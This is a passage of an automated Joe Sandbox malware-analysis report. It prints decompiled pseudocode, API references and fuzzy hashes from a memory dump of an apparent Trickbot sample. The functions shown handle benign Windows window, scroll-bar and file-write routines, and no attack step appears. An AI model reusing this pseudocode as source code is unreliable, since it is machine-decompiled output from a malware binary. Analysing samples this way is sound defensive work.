                          				_t140 = __edi;
                          				_t128 = __ecx;
                          				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
                          				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
                          				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
                          				_t143 = 2;
                          				if(_t138 == 0xa) {
                          					L7:
                          					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
                          					L9:
                          					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
                          					__eflags = _t81;
                          					L10:
                          					if(_t81 < 0) {
                          						_t81 = 0;
                          					}
                          					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
                          					_v12 =  *_t83;
                          					_v8 =  *((intOrPtr*)(_t83 + 4));
                          					GetWindowRect(GetDesktopWindow(),  &_v60);
                          					asm("movsd");
                          					asm("movsd");
                          					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
                          					asm("movsd");
                          					asm("movsd");
                          					if(_t87 == 0xa || _t87 == 0xc) {
                          						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
                          						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
                          						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
                          						if(__eflags != 0) {
                          							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
                          							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
                          							__eflags = _t106;
                          							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
                          							 *(_t128 + 0x48) = _v44.left;
                          							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
                          						}
                          					} else {
                          						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
                          						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
                          						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
                          						_t152 = _t120;
                          						if(_t120 != 0) {
                          							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
                          							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
                          							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
                          							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
                          						}
                          					}
                          					 *((intOrPtr*)(_t128 + 4)) = _a4;
                          					 *((intOrPtr*)(_t128 + 8)) = _a8;
                          					return E0042A6F8(_t128, _t152, 0);
                          				}
                          				if(_t138 == 0xb) {
                          					__eflags = _t138 - 0xa;
                          					if(_t138 != 0xa) {
                          						_t14 = __ecx + 0x30;
                          						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
                          						__eflags =  *_t14;
                          						goto L9;
                          					}
                          					goto L7;
                          				} else {
                          					_t143 = 0x22;
                          					if(_t138 != 0xc) {
                          						_t8 = __ecx + 0x34;
                          						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
                          						__eflags =  *_t8;
                          					} else {
                          						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
                          					}
                          					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
                          					goto L10;
                          				}
                          			}

                          APIs
                          • GetDesktopWindow.USER32 ref: 0042A3E5
                          • GetWindowRect.USER32(00000000,?), ref: 0042A3F0
                          • IntersectRect.USER32(?,?,?), ref: 0042A43B
                          • IntersectRect.USER32(?,?,?), ref: 0042A48F
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$IntersectWindow$Desktop
                          • String ID:
                          • API String ID: 123605412-0
                          • Opcode ID: fe78f2042b7b174f35b22b0f9df7314247878f01abb06aef3db3a54cb2751053
                          • Instruction ID: b984713fc8ff7a10234e45fea70fccfde9293b4f09dbd1641c29374badb9b0a2
                          • Opcode Fuzzy Hash: fe78f2042b7b174f35b22b0f9df7314247878f01abb06aef3db3a54cb2751053
                          • Instruction Fuzzy Hash: DB51D472A00209DFCF44DFA8D5C4A9EBBF8BF08310B544196ED05EB20AE634E981CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040BB5B(long _a4, void* _a8, long _a12) {
                          				intOrPtr* _v8;
                          				long _v12;
                          				long _v16;
                          				signed int _v20;
                          				void _v1048;
                          				void** _t66;
                          				signed int _t67;
                          				intOrPtr _t69;
                          				signed int _t70;
                          				intOrPtr _t71;
                          				signed int _t73;
                          				signed int _t80;
                          				int _t85;
                          				long _t87;
                          				intOrPtr* _t91;
                          				intOrPtr _t97;
                          				struct _OVERLAPPED* _t101;
                          				long _t103;
                          				signed int _t105;
                          				struct _OVERLAPPED* _t106;
                          
                          				_t101 = 0;
                          				_v12 = 0;
                          				_v20 = 0;
                          				if(_a12 != 0) {
                          					_t91 = 0x44cfa0 + (_a4 >> 5) * 4;
                          					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
                          					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
                          					if(__eflags != 0) {
                          						E0040BA83(__eflags, _a4, 0, 2);
                          					}
                          					_t66 =  *_t91 + _t105;
                          					__eflags = _t66[1] & 0x00000080;
                          					if((_t66[1] & 0x00000080) == 0) {
                          						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
                          						__eflags = _t67;
                          						if(_t67 == 0) {
                          							_a4 = GetLastError();
                          						} else {
                          							_a4 = _t101;
                          							_v12 = _v16;
                          						}
                          						L15:
                          						_t69 = _v12;
                          						__eflags = _t69 - _t101;
                          						if(_t69 != _t101) {
                          							_t70 = _t69 - _v20;
                          							__eflags = _t70;
                          							return _t70;
                          						}
                          						__eflags = _a4 - _t101;
                          						if(_a4 == _t101) {
                          							L25:
                          							_t71 =  *_t91;
                          							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
                          							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
                          								L27:
                          								 *((intOrPtr*)(E00406860())) = 0x1c;
                          								_t73 = E00406869();
                          								 *_t73 = _t101;
                          								L24:
                          								return _t73 | 0xffffffff;
                          							}
                          							__eflags =  *_a8 - 0x1a;
                          							if( *_a8 == 0x1a) {
                          								goto L1;
                          							}
                          							goto L27;
                          						}
                          						_t106 = 5;
                          						__eflags = _a4 - _t106;
                          						if(_a4 != _t106) {
                          							_t73 = E004067ED(_a4);
                          						} else {
                          							 *((intOrPtr*)(E00406860())) = 9;
                          							_t73 = E00406869();
                          							 *_t73 = _t106;
                          						}
                          						goto L24;
                          					}
                          					__eflags = _a12 - _t101;
                          					_v8 = _a8;
                          					_a4 = _t101;
                          					if(_a12 <= _t101) {
                          						goto L25;
                          					} else {
                          						goto L6;
                          					}
                          					do {
                          						L6:
                          						_t80 =  &_v1048;
                          						do {
                          							__eflags = _v8 - _a8 - _a12;
                          							if(_v8 - _a8 >= _a12) {
                          								break;
                          							}
                          							_v8 = _v8 + 1;
                          							_t97 =  *_v8;
                          							__eflags = _t97 - 0xa;
                          							if(_t97 == 0xa) {
                          								_v20 = _v20 + 1;
                          								 *_t80 = 0xd;
                          								_t80 = _t80 + 1;
                          								__eflags = _t80;
                          							}
                          							 *_t80 = _t97;
                          							_t80 = _t80 + 1;
                          							__eflags = _t80 -  &_v1048 - 0x400;
                          						} while (_t80 -  &_v1048 < 0x400);
                          						_t103 = _t80 -  &_v1048;
                          						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
                          						__eflags = _t85;
                          						if(_t85 == 0) {
                          							_a4 = GetLastError();
                          							break;
                          						}
                          						_t87 = _v16;
                          						_v12 = _v12 + _t87;
                          						__eflags = _t87 - _t103;
                          						if(_t87 < _t103) {
                          							break;
                          						}
                          						__eflags = _v8 - _a8 - _a12;
                          					} while (_v8 - _a8 < _a12);
                          					_t101 = 0;
                          					__eflags = 0;
                          					goto L15;
                          				}
                          				L1:
                          				return 0;
                          			}

                          APIs
                          • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 0040BC22
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: a172aba5220f98fc3a333bd479217c1d463cf4d580b45437f1a802cbb9e3f3e7
                          • Instruction ID: bb18ad5826797089b7b1e337a36143c6159ac971af168ef9565c0ae5ec806fe2
                          • Opcode Fuzzy Hash: a172aba5220f98fc3a333bd479217c1d463cf4d580b45437f1a802cbb9e3f3e7
                          • Instruction Fuzzy Hash: E151B031904208EFDF11CF69C884A9E7BB0FF45340F2485BAE816AB291DB34DA40CB9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 42%
                          			E004132C0(struct HWND__* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                          				long _v8;
                          				void* _t17;
                          				signed int _t21;
                          				signed int _t27;
                          				intOrPtr _t33;
                          				void* _t37;
                          				struct HWND__* _t38;
                          				intOrPtr* _t40;
                          
                          				_t37 = _a8;
                          				_t50 = _t37 - 0x82;
                          				if(_t37 != 0x82) {
                          					_t38 = _a4;
                          					_t17 = GetPropA(_t38, 0);
                          					_t40 = _a16;
                          					__eflags = _t17;
                          					_push(_t40);
                          					_t33 = _a20;
                          					_push(_a12);
                          					_push(_t37);
                          					_push(_t38);
                          					_push(_t33);
                          					_push(_t38);
                          					if(__eflags == 0) {
                          						_v8 = CallWindowProcA(E00410610(__eflags), ??, ??, ??, ??);
                          						__eflags = _t33 - 3;
                          						if(_t33 != 3) {
                          							_t21 = _v8;
                          							goto L8;
                          						} else {
                          							_t21 = GetWindowLongA(_t38, 0xfffffff0);
                          							__eflags = (_t21 & 0x00000003) - 2;
                          							if((_t21 & 0x00000003) != 2) {
                          								L8:
                          								__eflags = _t37 - 0x18;
                          								if(__eflags > 0) {
                          									__eflags = _t37 - 0x46;
                          									if(_t37 == 0x46) {
                          										__eflags =  *0x44d360 - 0x30a;
                          										if( *0x44d360 >= 0x30a) {
                          											E004122E0(_t38, _t40);
                          										}
                          										goto L11;
                          									} else {
                          										__eflags = _t37 - 0x1943;
                          										if(_t37 < 0x1943) {
                          											goto L11;
                          										} else {
                          											__eflags = _t37 - 0x1944;
                          											if(_t37 <= 0x1944) {
                          												 *_t40 = 1;
                          												return 0x3ea;
                          											} else {
                          												goto L11;
                          											}
                          										}
                          									}
                          								} else {
                          									if(__eflags == 0) {
                          										__eflags =  *0x44d360 - 0x30a;
                          										if( *0x44d360 < 0x30a) {
                          											__eflags = _a8;
                          											if(_a8 == 0) {
                          												E004122E0(_t38, 0);
                          											}
                          										}
                          									} else {
                          										__eflags = _t37 - 0xf;
                          										if(_t37 == 0xf) {
                          											__eflags = _t33 - 3;
                          											if(_t33 != 3) {
                          												L19:
                          												E00412F80(_t38, 1, _t33);
                          											} else {
                          												_t27 = _t21 & 0x00000003;
                          												__eflags = _t27 - 2;
                          												if(_t27 == 2) {
                          													goto L19;
                          												} else {
                          													__eflags = _t27 - 3;
                          													if(_t27 == 3) {
                          														goto L19;
                          													}
                          												}
                          											}
                          										}
                          									}
                          									L11:
                          									return _v8;
                          								}
                          							} else {
                          								return _v8;
                          							}
                          						}
                          					} else {
                          						return CallWindowProcA(E00410610(__eflags), ??, ??, ??, ??);
                          					}
                          				} else {
                          					return E00410840(_t50, _a4, _t37, _a12, _a16, _a20);
                          				}
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 00413306
                          • CallWindowProcA.USER32(00000000), ref: 00413331
                            • Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$CallProcRemoveWindow
                          • String ID:
                          • API String ID: 2276450057-0
                          • Opcode ID: 45dbdcf38811c861a943161a7cfed4aa96dd1d290477e3be477d3d217b4d6fdd
                          • Instruction ID: b98b64c3d47a9ee9caab4dddbef3177f36755a28518fe7ae4d998241309dde71
                          • Opcode Fuzzy Hash: 45dbdcf38811c861a943161a7cfed4aa96dd1d290477e3be477d3d217b4d6fdd
                          • Instruction Fuzzy Hash: 1D311976B40208A7D6109E09FC459EF7398EB86326F44066BFD14D3241DB2DAFC9826F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E00426D4A(intOrPtr __ecx, void* __eflags, int _a4, signed char _a8, signed int _a9, intOrPtr _a12) {
                          				intOrPtr _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				int _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				void* _t56;
                          				intOrPtr _t60;
                          				intOrPtr* _t68;
                          				intOrPtr* _t74;
                          				void* _t78;
                          				int _t79;
                          				void* _t100;
                          				void* _t101;
                          				void* _t103;
                          				intOrPtr* _t104;
                          
                          				_t104 = _a4;
                          				_v8 = __ecx;
                          				_t56 = E00424B1C(__ecx, _t104,  &_v20,  &_v32);
                          				if(_t56 == 0) {
                          					return _t56;
                          				}
                          				_t79 = 0;
                          				_v12 = 0;
                          				_v16 = 0;
                          				_t101 =  *((intOrPtr*)( *_t104 + 0x68))(1, _t100, _t78);
                          				if(_t101 != 0) {
                          					_v16 = GetScrollPos( *(_t101 + 0x1c), 2);
                          				}
                          				_v24 = _t79;
                          				_t60 =  *((intOrPtr*)( *_t104 + 0x68))(_t79);
                          				_v28 = _t60;
                          				if(_t60 != _t79) {
                          					_v24 = GetScrollPos( *(_t60 + 0x1c), 2);
                          				}
                          				_push(_a12);
                          				_push(_t79);
                          				_push(_a8);
                          				if( *((intOrPtr*)( *_t104 + 0xbc))() != 0) {
                          					_v12 = 1;
                          				}
                          				if(_t101 == _t79) {
                          					L14:
                          					if(_v28 == _t79) {
                          						L20:
                          						return _v12;
                          					}
                          					_t103 = 0;
                          					if( *((intOrPtr*)(_v8 + 0x68)) <= _t79) {
                          						goto L20;
                          					} else {
                          						goto L16;
                          					}
                          					do {
                          						L16:
                          						if(_t103 != _v20) {
                          							SetScrollPos( *(_v28 + 0x1c), 2, _v24, _t79);
                          							_t68 = E00424B00(_v8, _t103, _v32);
                          							_push(_a12);
                          							_push(_t79);
                          							_push(_a8 & 0x000000ff | 0x000000ff);
                          							if( *((intOrPtr*)( *_t68 + 0xbc))() != 0) {
                          								_v12 = 1;
                          							}
                          						}
                          						_t103 = _t103 + 1;
                          					} while (_t103 <  *((intOrPtr*)(_v8 + 0x68)));
                          					goto L20;
                          				} else {
                          					_a4 = _t79;
                          					if( *((intOrPtr*)(_v8 + 0x6c)) <= _t79) {
                          						goto L14;
                          					} else {
                          						goto L9;
                          					}
                          					do {
                          						L9:
                          						if(_a4 != _v32) {
                          							SetScrollPos( *(_t101 + 0x1c), 2, _v16, _t79);
                          							_t74 = E00424B00(_v8, _v20, _a4);
                          							_push(_a12);
                          							_push(_t79);
                          							_push(_a9 & 0x0000ffff | 0x000000ff);
                          							if( *((intOrPtr*)( *_t74 + 0xbc))() != 0) {
                          								_v12 = 1;
                          							}
                          							_t79 = 0;
                          						}
                          						_a4 = _a4 + 1;
                          					} while (_a4 <  *((intOrPtr*)(_v8 + 0x6c)));
                          					goto L14;
                          				}
                          			}

                          APIs
                            • Part of subcall function 00424B1C: GetDlgCtrlID.USER32(?), ref: 00424B2A
                            • Part of subcall function 00424B1C: IsChild.USER32(?,?), ref: 00424B3E
                          • GetScrollPos.USER32(?,00000002), ref: 00426D8B
                          • GetScrollPos.USER32(?,00000002), ref: 00426DAB
                          • SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426DF6
                          • SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426E5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Scroll$ChildCtrl
                          • String ID:
                          • API String ID: 656700424-0
                          • Opcode ID: 6353dc9dcd4ac7a6220cdb68b813c80304ceb8b84d5b842803d72ebc2d6144a4
                          • Instruction ID: b7d6994942247ff049465cf3fabc1c5a7a62e4cb7689a6856a83465d6b19d131
                          • Opcode Fuzzy Hash: 6353dc9dcd4ac7a6220cdb68b813c80304ceb8b84d5b842803d72ebc2d6144a4
                          • Instruction Fuzzy Hash: 85414C75A00219EFDF10DFA5D885EAEBBB9FF44310F51806AE905A7291C734AD40CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E00426EA1(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				int _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				int _v24;
                          				char _v28;
                          				intOrPtr _v32;
                          				void* _t63;
                          				intOrPtr _t67;
                          				intOrPtr* _t74;
                          				intOrPtr* _t79;
                          				void* _t83;
                          				intOrPtr _t85;
                          				void* _t99;
                          				void* _t100;
                          				intOrPtr _t101;
                          				intOrPtr* _t103;
                          
                          				_t103 = _a4;
                          				_v16 = __ecx;
                          				_t63 = E00424B1C(__ecx, _t103,  &_v20,  &_v28);
                          				if(_t63 == 0) {
                          					return _t63;
                          				}
                          				_v8 = _v8 & 0x00000000;
                          				_v12 = _v12 & 0x00000000;
                          				_t100 =  *((intOrPtr*)( *_t103 + 0x68))(1, _t99, _t83);
                          				if(_t100 != 0) {
                          					_v12 = GetScrollPos( *(_t100 + 0x1c), 2);
                          				}
                          				_v24 = _v24 & 0x00000000;
                          				_t67 =  *((intOrPtr*)( *_t103 + 0x68))(0);
                          				_v32 = _t67;
                          				if(_t67 != 0) {
                          					_v24 = GetScrollPos( *(_t67 + 0x1c), 2);
                          				}
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_a8);
                          				if( *((intOrPtr*)( *_t103 + 0xc0))() != 0) {
                          					_v8 = 1;
                          				}
                          				if(_t100 == 0) {
                          					_t85 = _v16;
                          				} else {
                          					_t85 = _v16;
                          					_a4 = _a4 & 0x00000000;
                          					if( *((intOrPtr*)(_t85 + 0x6c)) <= 0) {
                          						L15:
                          						_t101 = _v32;
                          						if(_t101 == 0) {
                          							L21:
                          							return _v8;
                          						}
                          						_a4 = _a4 & 0x00000000;
                          						if( *((intOrPtr*)(_t85 + 0x68)) <= 0) {
                          							goto L21;
                          						} else {
                          							goto L17;
                          						}
                          						do {
                          							L17:
                          							if(_a4 != _v20) {
                          								SetScrollPos( *(_t101 + 0x1c), 2, _v24, 0);
                          								_t74 = E00424B00(_t85, _a4, _v28);
                          								_push(_a16);
                          								_push(0);
                          								_push(_a8);
                          								if( *((intOrPtr*)( *_t74 + 0xc0))() != 0) {
                          									_v8 = 1;
                          								}
                          							}
                          							_a4 = _a4 + 1;
                          						} while (_a4 <  *((intOrPtr*)(_t85 + 0x68)));
                          						goto L21;
                          					} else {
                          						goto L9;
                          					}
                          					do {
                          						L9:
                          						if(_a4 != _v28) {
                          							SetScrollPos( *(_t100 + 0x1c), 2, _v12, 0);
                          							_t79 = E00424B00(_t85, _v20, _a4);
                          							_push(_a16);
                          							_push(_a12);
                          							_push(0);
                          							if( *((intOrPtr*)( *_t79 + 0xc0))() != 0) {
                          								_v8 = 1;
                          							}
                          						}
                          						_a4 = _a4 + 1;
                          					} while (_a4 <  *((intOrPtr*)(_t85 + 0x6c)));
                          				}
                          			}

                          APIs
                            • Part of subcall function 00424B1C: GetDlgCtrlID.USER32(?), ref: 00424B2A
                            • Part of subcall function 00424B1C: IsChild.USER32(?,?), ref: 00424B3E
                          • GetScrollPos.USER32(?,00000002), ref: 00426EE8
                          • GetScrollPos.USER32(?,00000002), ref: 00426F06
                          • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 00426F52
                          • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 00426FB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Scroll$ChildCtrl
                          • String ID:
                          • API String ID: 656700424-0
                          • Opcode ID: 767dd63529825d7f2e48d1541d4dc86c93cca7101560a43602e8b918d92667c5
                          • Instruction ID: 4c8f1e1ae9dcd58102175802ba172434e51234b086cff7a4be34fc1ee9304588
                          • Opcode Fuzzy Hash: 767dd63529825d7f2e48d1541d4dc86c93cca7101560a43602e8b918d92667c5
                          • Instruction Fuzzy Hash: D7413431A00219AFDF11DF54E985BAEBBB5FF44304F62806AF804AB291C775EE50DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00434E7C(void* __ecx, int _a4, int _a8, int _a12) {
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				intOrPtr _t60;
                          				intOrPtr _t61;
                          				intOrPtr _t66;
                          				int _t68;
                          				void* _t69;
                          				intOrPtr _t75;
                          				intOrPtr* _t78;
                          				signed short _t94;
                          				intOrPtr* _t107;
                          				signed int _t110;
                          				int* _t111;
                          				intOrPtr _t113;
                          				void* _t114;
                          
                          				_t114 = __ecx;
                          				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
                          					_t89 = _a4;
                          					_t60 =  *((intOrPtr*)(__ecx + 0x90));
                          					 *(__ecx + 0xf8) = 1;
                          					_t110 = _a4 + _a4 * 4 << 3;
                          					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
                          					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
                          					_t61 =  *((intOrPtr*)(__ecx + 0x90));
                          					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
                          					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
                          					E00434FEB(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
                          					E004345A6(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
                          					_t66 =  *((intOrPtr*)(_t114 + 0x90));
                          					_t111 = _t110 + _t66 + 0x18;
                          					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
                          					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
                          					_t107 =  *((intOrPtr*)(_t114 + 0x90));
                          					_a8 = _a8 +  *_t107;
                          					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
                          					__eflags = _t69;
                          					_push(_t69);
                          					_push(_a8);
                          					return E0041FFD7(_t114,  *((intOrPtr*)(_t107 + 4)));
                          				}
                          				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
                          				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
                          				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
                          				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
                          				if(_t94 >= 0x8000) {
                          					L3:
                          					_a4 = 0;
                          					L4:
                          					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
                          					if(_a4 != 0) {
                          						_t78 =  *((intOrPtr*)(_t114 + 0x114));
                          						_v28 = 3;
                          						_t113 = 1;
                          						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
                          						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
                          						_v16 = _t113;
                          						if(E0041A10F(_t114, _t113,  &_v32, 0) == 0) {
                          							E0041A069(_t114, _t113, _v24, _v20, 0);
                          						}
                          					}
                          					return E00434FEB(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
                          				}
                          				_a4 = 1;
                          				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                          					goto L4;
                          				}
                          				goto L3;
                          			}

                          APIs
                          • ShowScrollBar.USER32(?,00000000,00000000), ref: 00434EAC
                          • ShowScrollBar.USER32(?,00000001,?), ref: 00434EE7
                          • MulDiv.KERNEL32(?,?,?), ref: 00434FBA
                          • MulDiv.KERNEL32(?,?,?), ref: 00434FC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ScrollShow
                          • String ID:
                          • API String ID: 3611344627-0
                          • Opcode ID: 42d629f387b1b796f16a0c094c391571b08cee01f6f670d00fc2c33f12f4ac6d
                          • Instruction ID: 4d6583212506bd3c30a9fcfeae041dba725c3e829584cf0c149fccc3b8ff861a
                          • Opcode Fuzzy Hash: 42d629f387b1b796f16a0c094c391571b08cee01f6f670d00fc2c33f12f4ac6d
                          • Instruction Fuzzy Hash: 89414774600605AFCB14DF59C880EAABBF5FF88308F10852EE91A9B361D774E851DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00428953(intOrPtr* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                          				void* __ebp;
                          				signed int _t20;
                          				void* _t22;
                          				signed int _t24;
                          				CHAR* _t25;
                          				signed int _t29;
                          				void* _t30;
                          				signed int _t32;
                          				CHAR* _t33;
                          				signed int _t36;
                          				intOrPtr* _t37;
                          				char _t40;
                          				signed char _t42;
                          				signed int _t44;
                          				CHAR* _t45;
                          				signed int _t48;
                          				void* _t50;
                          
                          				_t48 = _a8;
                          				_t36 = 0;
                          				_t44 = _t48;
                          				if( *_t48 == 0) {
                          					L17:
                          					_t37 = _a4;
                          					_t45 = E004181F7(_t37, _t50, _t36);
                          					while( *_t48 != 0) {
                          						_t40 =  *_t48;
                          						if(_t40 != 0x25) {
                          							L31:
                          							_t20 = _t40 & 0x000000ff;
                          							__eflags =  *(_t20 + 0x44d1e1) & 0x00000004;
                          							if(( *(_t20 + 0x44d1e1) & 0x00000004) != 0) {
                          								 *_t45 = _t40;
                          								_t45 =  &(_t45[1]);
                          								_t48 = _t48 + 1;
                          								__eflags = _t48;
                          							}
                          							 *_t45 =  *_t48;
